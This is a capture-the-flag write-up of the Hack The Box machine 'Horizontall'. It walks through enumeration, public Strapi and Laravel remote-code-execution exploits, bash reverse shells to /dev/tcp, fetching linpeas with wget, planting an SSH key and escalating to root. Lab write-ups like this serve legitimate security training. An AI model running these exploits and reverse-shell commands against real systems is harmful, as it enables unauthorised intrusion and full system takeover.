Previous Page
Horizontall Writeup
Introduction :
Horizontall is an easy Linux box released back in August 2021.
Horizontall is an easy Linux box released back in August 2021.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV -p- horizontall.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC
Nmap scan report for horizontall.htb (10.129.17.82)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds
Our nmap scan picked up port 80 so let's investigate it:
Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite:
And here we found out that there was another domain we could use: api-prod.horizontall.htb so let's add it to our hosts file:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cat /etc/hosts | grep horizontall
10.129.17.82 horizontall.htb api-prod.horizontall.htb
So let's browse to the api endpoint at http://api-prod.horizontall.htb/reviews:
Then let's enumerate it with gobuster:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 15:47:07 Starting gobuster in directory enumeration mode
===============================================================
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
/admin (Status: 200) [Size: 854]
/Reviews (Status: 200) [Size: 507]
/Users (Status: 403) [Size: 60]
/admin looks interesting, so let's investigate it:
Here we have a strapi admin login webpage, so let's take a look at the available exploits for it:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit strapi
----------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------- ---------------------------------
Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Let's use the Unauthenticated exploit:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp $(locate 50239.py) .
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ vim 50239.py
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4
$>
This exploit basically resets the admin@horizontall.htb user's password to SuperStrongPassword1 so once we ran it we can login:
but the more interesting part is that we can execute code:
$> bash
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
id
However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead:
[term 1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A
$> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999
Connection from 10.129.17.82:42004
bash: cannot set terminal process group (1975): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$ id
id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
strapi@horizontall:~/myapi$
Now that we got a reverse shell, let's upgrade it to a fully interactive tty:
strapi@horizontall:~/myapi$ which wget curl python python3
which wget curl python python3
/usr/bin/wget
/usr/bin/curl
/usr/bin/python
/usr/bin/python3
#spawn a TTY shell with python3:
strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
#CTRL+Z to background the process
strapi@horizontall:~/myapi$ ^Z
[1] + 3112123 suspended nc -lvnp 9999
#stty raw it and then bring it back to the foreground:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ stty raw -echo ; fg
[1] + 3112123 continued nc -lvnp 9999
#then set the TERM and SHELL env variables and the tty rows and colums:
strapi@horizontall:~/myapi$ export TERM=screen-256color
strapi@horizontall:~/myapi$ export SHELL=bash
strapi@horizontall:~/myapi$ stty rows 30 cols 200
#reset to refresh the terminal
strapi@horizontall:~/myapi$ reset
Now that we have a fully interactive TTY reverse shell, we can go grab the user flag:
strapi@horizontall:~$ cd /home/
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer/
strapi@horizontall:/home/developer$ ls
composer-setup.php myproject user.txt
strapi@horizontall:/home/developer$ cat user.txt
fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the user flag.
Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths:
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp ../BountyHunter/linpeas.sh .
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term2]
strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh
strapi@horizontall:/tmp$ chmod +x linpeas.sh
strapi@horizontall:/tmp$ ./linpeas.sh
Now what's interesting here is the local port 8000:
As it is written, it's a local port, so let's port forward it via SSH:
[term1]
strapi@horizontall:~$ mkdir .ssh
strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Nov 20 17:04:40 UTC 2022
System load: 0.0 Processes: 183
Usage of /: 82.1% of 4.85GB Users logged in: 0
Memory usage: 45% IP address for eth0: 10.129.17.82
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14
$
[term3]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV 127.0.0.1 -p 8000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000048s latency).
PORT STATE SERVICE VERSION
8000/tcp open http (PHP 7.4.22)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Sun, 20 Nov 2022 17:05:31 GMT
| Connection: close
| X-Powered-By: PHP/7.4.22
| Cache-Control: no-cache, private
| date: Sun, 20 Nov 2022 17:05:31 GMT
| Content-type: text/html; charset=UTF-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Not Found</title>
| <!-- Fonts -->
| <link rel="preconnect" href="https://fonts.gstatic.com">
| <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
| <style>
| normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sun, 20 Nov 2022 17:05:26 GMT
| Connection: close
| X-Powered-By: PHP/7.4.22
| Content-Type: text/html; charset=UTF-8
| Cache-Control: private, must-revalidate
| Date: Sun, 20 Nov 2022 17:05:26 GMT
| pragma: no-cache
| expires: -1
| Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax
|_ Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3
After port-forwarding the port 8000 we see it's a laravel webserver:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:8000
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 17:12:29 Starting gobuster in directory enumeration mode
===============================================================
/profiles (Status: 500) [Size: 616204]
gobuster found /profiles so let's investigate it:
So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done
#since the ssh port forwarding keeps dying, run it like that ^
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit laravel 8
----------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------- ---------------------------------
Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt
Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py
Laravel Log Viewer < 0.13.0 - Local File Download | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Let's take a look at the RCE one:
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"'
Exploit...
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 4444
Connection from 10.129.17.82:33968
bash: cannot set terminal process group (27737): Inappropriate ioctl for device
bash: no job control in this shell
root@horizontall:/home/developer/myproject/public#
root@horizontall:/home/developer/myproject/public# id
id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:/home/developer/myproject/public# cd
cd
root@horizontall:~# cat root.txt
cat root.txt
bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
Contact: nihilist@contact.nowhere.moe (PGP)
